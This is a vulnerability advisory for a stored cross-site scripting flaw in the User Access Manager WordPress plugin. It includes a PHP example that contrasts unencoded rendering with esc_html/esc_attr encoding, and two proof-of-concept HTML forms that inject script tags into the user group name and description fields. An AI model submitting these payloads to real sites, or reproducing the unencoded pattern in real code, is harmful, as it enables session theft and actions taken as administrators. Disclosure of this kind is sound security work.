Abstract
A persistent Cross-Site Scripting vulnerability has been encountered in the User Access Manager WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing other Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker needs to have an Administrator account in the WordPress website.
OVE ID
OVE-20160712-0025
Tested versions
This issue was successfully tested on the User Access Manager WordPress Plugin version 1.2.6.7.
Fix
This issue is resolved in User Access Manager version 1.2.14.
Introduction
With the User Access Manager WordPress plugin it is possible to manage access to posts, pages and files. This plugin is useful if you need a member area or a private section on your blog, or if you want other people to be able to write on your blog, but not everywhere.
Details
Persistent Cross-Site Scripting was found in the admin panel's user group management page of User Access Manager. Multiple parameters of the POST request to the uam_usergroup page are affected due to insufficient output encoding: the submitted values are stored and later rendered into the page without being HTML-encoded. This issue allows an attacker to perform a wide variety of actions, such as stealing other Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker needs to have an Administrator account in the WordPress website.
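The defect class the advisory describes, insufficient output encoding of a stored value, shown next to the fix a WordPress plugin would apply, as an added example that is not the User Access Manager plugin's own code. The rendering functions and the sample group record are constructed for illustration; the esc_html()/esc_attr() shims only exist so the file runs outside WordPress.

```php
<?php
// Added example, not code from the User Access Manager plugin.
// (a) renders a stored user group the way the advisory's vulnerable page did
//     (no output encoding), (b) renders it with WordPress's esc_html()/esc_attr().
// Shims (assumption): inside WordPress the real functions are already defined
// and these definitions are skipped.
if (!function_exists('esc_html')) {
    function esc_html($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}

// Constructed sample record, mirroring the payload stored via userGroupName
// in the proof of concept.
$group = ['name' => 'as<script>alert(1)</script>', 'description' => 'asd'];

// (a) Vulnerable pattern: the stored value is interpolated straight into HTML,
//     so the script tag is emitted verbatim and runs for every administrator
//     who opens the management page.
function render_row_unsafe(array $g): string
{
    return "<tr><td>{$g['name']}</td><td>{$g['description']}</td></tr>\n";
}

// (b) Hardened pattern: encode for the HTML text context with esc_html(), and
//     for attribute values with esc_attr(); '<' and '>' become '&lt;' and '&gt;'.
function render_row_safe(array $g): string
{
    return '<tr><td>' . esc_html($g['name']) . '</td>'
         . '<td>' . esc_html($g['description']) . '</td>'
         . '<td><input type="text" name="userGroupName" value="'
         . esc_attr($g['name']) . '" /></td></tr>' . "\n";
}

echo render_row_unsafe($group);  // contains a live <script> element
echo render_row_safe($group);    // contains only &lt;script&gt; text
```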
Proof of concept
<!-- PoC 1: stored XSS via the userGroupName parameter -->
<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=uam_usergroup" method="POST">
<input type="hidden" name="uamInsertUpdateGroupNonce" value="8657bd2424" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=uam_usergroup" />
<input type="hidden" name="action" value="addGroup" />
<!-- affected parameter -->
<input type="hidden" name="userGroupName" value="as<script>alert(1)</script>" />
<input type="hidden" name="userGroupDescription" value="asd" />
<input type="hidden" name="ipRange" value="asd" />
<input type="hidden" name="readAccess" value="group" />
<input type="hidden" name="writeAccess" value="group" />
<input type="hidden" name="submit" value="Add user group" />
<input type="hidden" name="" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
<!-- PoC 2: stored XSS via the userGroupDescription parameter -->
<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=uam_usergroup" method="POST">
<input type="hidden" name="uamInsertUpdateGroupNonce" value="8657bd2424" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=uam_usergroup" />
<input type="hidden" name="action" value="addGroup" />
<input type="hidden" name="userGroupName" value="sad" />
<!-- affected parameter -->
<input type="hidden" name="userGroupDescription" value="<script>alert(2)</script>" />
<input type="hidden" name="ipRange" value="asd" />
<input type="hidden" name="readAccess" value="group" />
<input type="hidden" name="writeAccess" value="group" />
<input type="hidden" name="submit" value="Add user group" />
<input type="submit" value="Submit" />
</form>
</body>
</html>